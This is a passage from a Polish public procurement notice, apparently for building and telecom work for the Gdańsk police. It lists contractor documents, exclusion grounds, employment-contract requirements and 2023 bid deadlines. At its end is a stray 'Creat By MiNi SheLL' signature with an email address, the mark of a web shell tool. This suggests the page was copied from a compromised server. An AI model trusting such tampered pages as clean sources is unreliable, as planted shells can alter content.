o specjalności sieci i instalacje telekomunikacyjnej;<br/><br/>Bezpośredni wykonawcy montażu instalacji i systemów teleinformatycznych , alarmowych i dozoru obiektu muszą posiadać uprawnienia Certyfikowanego Instalatora tych instalacji i systemów , oraz wykazać się wpisem na listę kwalifikowanych pracowników zabezpieczenia technicznego.<br/><br/>Na potwierdzenie należy złożyć wykaz osób zgodnie załącznikiem nr 8 do SWZ.<br/><br/><br/>UWAGA! (jeżeli dotyczy)<br/>W przypadku, gdy ww. zakres zadania będzie stanowił część usługi o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo zadanie, o którym mowa powyżej. <br/><br/>3.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie <br/>posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. (jeżeli dotyczy) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) załącznik nr 2 do SWZ tj. oświadczenia wykonawcy/ wykonawcy wspólnie ubiegającego się o udzielenie zamówienia uwzględniające przesłanki wykluczenia z art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, składane na podstawie art. 125<br/>ust. 1 ustawy Pzp.<br/>Niniejszy dokument składa i podpisuje na zasadach opisanych w rozdziale XV SWZ Wykonawca oraz każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/><br/>2) załącznik nr 3 do SWZ tj. oświadczenia podmiotu udostępniającego zasoby uwzględniające przesłanki wykluczenia z art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego składane na podstawie art. 125 ust. 1 w zw. art. 125 ust. 5 ustawy Pzp.<br/>Niniejszy dokument składa i podpisuje na zasadach opisanych w rozdziale XV SWZ podmiot udostępniający zasoby.<br/>Wykonawca ww. dokument dołącza do swojej oferty, jeżeli przedmiot zamówienia publicznego zamierza wykonać przy pomocy podmiotu udostępniającego zasoby.<br/><br/>3) załącznik nr 6 tj. Zobowiązanie podmiotu udostępnianego zasoby <br/>Niniejszy dokument składa i podpisuje na zasadach opisanych w rozdziale XV SWZ podmiot udostępniający zasoby.<br/>Wykonawca ww. dokument dołącza do swojej oferty, jeżeli przedmiot zamówienia publicznego zamierza wykonać przy pomocy podmiotu udostępniającego zasoby.<br/>Szczegółowe informacje zawarte są w rozdziale VII SWZ.<br/>4) załącznik nr 7 do SWZ tj. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, dotyczące realizacji zakresu przedmiotu zamówienia, przez poszczególnych wykonawców.<br/>Niniejszy dokument podpisany na zasadach opisanych w rozdziale XV SWZ składa Wykonawca, jeżeli wspólnie z innymi Wykonawcami ubiega się o udzielenie zamówienia. Informacje zawarte są w rozdziale VIII SWZ.<br/><br/>5) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentacji.<br/>Zamawiający nie będzie żądał przedmiotowych dokumentów o ile Wykonawca wskaże w formularzu ofertowym dane umożliwiające dostęp do tych dokumentów: bezpłatnych i ogólnodostępnych baz danych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz osób – KADRA TECHNICZNA, zgodnie z załącznikiem nr 8 do SWZ.<br/>2) Wykaz wykonywanych robót budowlanych zgodnie z załącznikiem nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferty cenowej zgodnie z załączonym drukiem „formularza oferty” – załącznik nr 1 do<br/>SWZ. UWAGA: dokument dot. pkt 1 nie podlega uzupełnieniu i niezłożenie dokumentu spowoduje odrzucenie oferty.<br/><br/>W sytuacji gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa lub inny dokument obejmujący swym zakresem umocowanie do złożenia oferty wraz z wymaganymi dokumentami lub do złożenia oferty i podpisania umowy<br/><br/>2) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu o którym mowa w art. 125 ust. 1 u-Pzp - zał. nr 4 do SWZ.<br/><br/>3. Oświadczenie własne Wykonawcy o odbyciu wizji lokalnej.<br/>4. Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 U-Pzp sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje znajdują się w Rozdziale VIII, VIII a i XIV SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe wymagania dotyczące realizacji zostały określone we wzorze umowy, stanowiącym Załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-22 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/kwp_gdansk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-22 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przewidziano obligatoryjne przesłanki wykluczenia na podstawie art. 108, ust. 1 u-Pzp oraz na podstawie art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835)<br/>Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez Zamawiającego przepisów Ustawy, przysługują środki ochrony prawnej określone w<br/>dziale IX Ustawy.<br/>Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. <br/>22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2022 r. poz. 1510) obejmują następujące czynności: TAK<br/><br/>Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia:<br/>Czynności związane z robotami ogólnobudowlanymi – 3 osoby<br/>Czynności związane z robotami sanitarnymi – 2 osoby<br/>Czynności związane z robotami elektrycznymi – 2 osoby<br/>Czynności związane z robotami teletechnicznymi – 1 osoba<br/><br/>Sposób weryfikacji oraz uprawnienia Zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań określa § 7 umowy, będącym załącznikiem nr 5 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com